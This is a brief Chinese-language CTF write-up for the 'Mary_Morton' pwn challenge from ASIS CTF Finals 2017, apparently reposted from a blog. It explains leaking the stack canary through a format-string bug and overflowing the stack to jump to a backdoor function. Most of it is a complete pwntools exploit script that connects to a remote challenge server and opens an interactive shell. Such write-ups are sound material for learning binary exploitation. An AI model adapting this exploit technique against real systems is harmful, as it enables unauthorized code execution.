Mary_Morton
作者:互联网
题目来源: ASIS-CTF-Finals-2017
题目描述:非常简单的热身pwn
程序开启了canary保护,因此利用格式化字符串漏洞泄露canary,然后利用栈溢出漏洞将返回地址指向后门函数即可
exp如下:
from pwn import *
#io = process('./pwn')
#io = gdb.debug('./pwn', 'b *0x40093F')
io = remote('111.200.241.244', 50734)
backdoor_addr = 0x4008DA
io.recvuntil('3. Exit the battle \n')
io.sendline('2')
sleep(1)
io.sendline('%23$p\n')
canary = int(io.recvline().strip(), 16)
info('canary:'+str(hex(canary)))
io.recvuntil('3. Exit the battle \n')
io.sendline('1')
payload = b'a' * 136 + p64(canary) + p64(0) + p64(backdoor_addr)
sleep(1)
io.send(payload)
io.interactive()
标签:p64,canary,sendline,io,pwn,Exit,Morton,Mary 来源: https://www.cnblogs.com/hktk1643/p/15143999.html